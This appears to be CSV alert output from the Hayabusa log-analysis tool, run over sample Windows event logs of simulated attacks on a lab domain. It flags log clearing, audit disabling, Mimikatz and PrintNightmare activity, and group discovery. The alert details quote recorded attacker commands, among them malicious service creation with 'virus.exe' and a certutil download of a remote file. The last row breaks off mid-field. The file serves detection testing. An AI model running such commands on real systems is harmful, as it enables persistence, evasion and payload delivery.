File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-25 18:21:02.504 +00:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Audit policy enumerated.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 18:30:36.515 +00:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-25 20:17:07.565 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc create hacker-testl3 binPath=""3virus.exe"" | Path: C:\Windows\System32\sc.exe | PID: 0x64c | User: admmig | LID: 0x123550",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service created (command).evtx +2021-10-25 20:17:07.565 +00:00,FS03.offsec.lan,4688,low,Persis | PrivEsc,New Service Creation,,rules/sigma/process_creation_builtin/proc_creation_win_new_service_creation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service created (command).evtx +2021-10-25 20:23:34.575 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"New-Service -Name ""hackervirus"" -BinaryPathName '""virus.exe""'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service creation (PowerShell).evtx +2021-10-25 20:23:34.715 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Service): ""New-Service"" ParameterBinding(New-Service): name=""Name""; value=""hackervirus"" ParameterBinding(New-Service): name=""BinaryPathName""; value=""""virus.exe""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service creation (PowerShell).evtx +2021-10-25 20:23:34.715 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"[System.Diagnostics.DebuggerHidden()] param() $foundSuggestion = $false if($lastError -and ($lastError.Exception -is ""System.Management.Automation.CommandNotFoundException"")) { $escapedCommand = [System.Management.Automation.WildcardPattern]::Escape($lastError.TargetObject) $foundSuggestion = @(Get-Command ($ExecutionContext.SessionState.Path.Combine(""."", $escapedCommand)) -ErrorAction Ignore).Count -gt 0 } $foundSuggestion",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service creation (PowerShell).evtx +2021-10-25 20:23:34.715 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""hackervirus""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service creation (PowerShell).evtx +2021-10-25 20:23:34.715 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"""The command $($lastError.TargetObject) was not found, but does exist in the current location. Windows PowerShell does not load commands from the current location by default. If you trust this command, instead type `"".\$($lastError.TargetObject)`"". See `""get-help about_Command_Precedence`"" for more details.""",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service creation (PowerShell).evtx +2021-10-25 20:23:34.736 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service creation (PowerShell).evtx +2021-10-27 10:09:16.280 +00:00,fs03vuln.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 10:12:47.151 +00:00,fs03vuln.offsec.lan,4674,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" +2021-10-27 10:12:47.229 +00:00,fs03vuln.offsec.lan,5142,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" +2021-10-27 10:12:47.323 +00:00,fs03vuln.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 10:14:21.369 +00:00,fs03vuln.offsec.lan,302,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 10:14:21.369 +00:00,fs03vuln.offsec.lan,849,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 10:14:21.369 +00:00,fs03vuln.offsec.lan,301,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 10:14:27.403 +00:00,fs03vuln.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 10:14:27.403 +00:00,fs03vuln.offsec.lan,4674,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" +2021-10-27 10:14:27.466 +00:00,fs03vuln.offsec.lan,848,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 10:14:27.466 +00:00,fs03vuln.offsec.lan,5142,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" +2021-10-27 10:14:27.559 +00:00,fs03vuln.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 10:14:27.559 +00:00,fs03vuln.offsec.lan,300,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 10:28:26.260 +00:00,FS03.offsec.lan,354,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx +2021-10-27 10:28:26.260 +00:00,FS03.offsec.lan,354,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx +2021-10-27 10:28:26.307 +00:00,FS03.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx +2021-10-27 10:34:49.837 +00:00,FS03.offsec.lan,6416,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx" +2021-10-27 10:34:50.024 +00:00,FS03.offsec.lan,4674,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx" +2021-10-27 10:35:56.899 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf08 | User: FS03$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx" +2021-10-28 13:41:21.325 +00:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: ""cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\System32\spoolsv.exe | LID: 0x3e7 | PID: 3388 | PGUID: 7CF65FC7-A881-617A-0605-000000001300 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx +2021-10-28 13:41:21.325 +00:00,FS03.offsec.lan,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation_sysmon/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx +2021-10-31 14:28:15.330 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx +2021-10-31 14:28:15.331 +00:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,Get-LocalGroupMember -Name Administrators,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx +2021-10-31 14:28:15.331 +00:00,jump01.offsec.lan,4104,low,Disc,Suspicious Get Local Groups Information,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_local_group_reco.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx +2021-10-31 14:28:15.342 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-LocalGroupMember): ""Get-LocalGroupMember"" ParameterBinding(Get-LocalGroupMember): name=""Name""; value=""Administrators""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx +2021-10-31 14:28:15.342 +00:00,jump01.offsec.lan,4103,low,Disc,Suspicious Get Local Groups Information,,rules/sigma/powershell/powershell_module/posh_pm_suspicious_local_group_reco.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx +2021-10-31 14:28:15.351 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""JUMP01\Administrator"" ParameterBinding(Out-Default): name=""InputObject""; value=""OFFSEC\Domain Admins"" ParameterBinding(Out-Default): name=""InputObject""; value=""OFFSEC\Nessus Local Access"" ParameterBinding(Out-Default): name=""InputObject""; value=""OFFSEC\SG_LocalAdmin_Lab""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx +2021-10-31 14:28:15.353 +00:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx +2021-10-31 14:28:15.354 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx +2021-10-31 14:37:10.246 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Domain group discovery via PowerShell.evtx +2021-10-31 14:37:10.247 +00:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,Get-ADGroupMember -Identity 'Administrators',rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Domain group discovery via PowerShell.evtx +2021-10-31 14:37:10.396 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-ADGroupMember): ""Get-ADGroupMember"" ParameterBinding(Get-ADGroupMember): name=""Identity""; value=""Administrators""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Domain group discovery via PowerShell.evtx +2021-10-31 14:37:10.398 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""CN=Nessus Local Access,OU=Security-groups,OU=OFFSEC-COMPANY,DC=offsec,DC=lan"" ParameterBinding(Out-Default): name=""InputObject""; value=""CN=Domain Admins,CN=Users,DC=offsec,DC=lan"" ParameterBinding(Out-Default): name=""InputObject""; value=""CN=Enterprise Admins,CN=Users,DC=offsec,DC=lan"" ParameterBinding(Out-Default): name=""InputObject""; value=""CN=Administrator,CN=Users,DC=offsec,DC=lan""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Domain group discovery via PowerShell.evtx +2021-10-31 14:37:10.401 +00:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Domain group discovery via PowerShell.evtx +2021-10-31 14:37:10.402 +00:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Domain group discovery via PowerShell.evtx +2021-11-02 14:15:23.676 +00:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1140-Deobfuscate-Decode Files or Information/ID4688-Certutil download.evtx +2021-11-02 14:15:24.567 +00:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: certutil -urlcache -split -f https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/blob/master/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec%20remote%20trask%20creation%20(GLOBAL).evtx virus.exe | Path: C:\Windows\System32\certutil.exe | PID: 0xedc | User: admmig | LID: 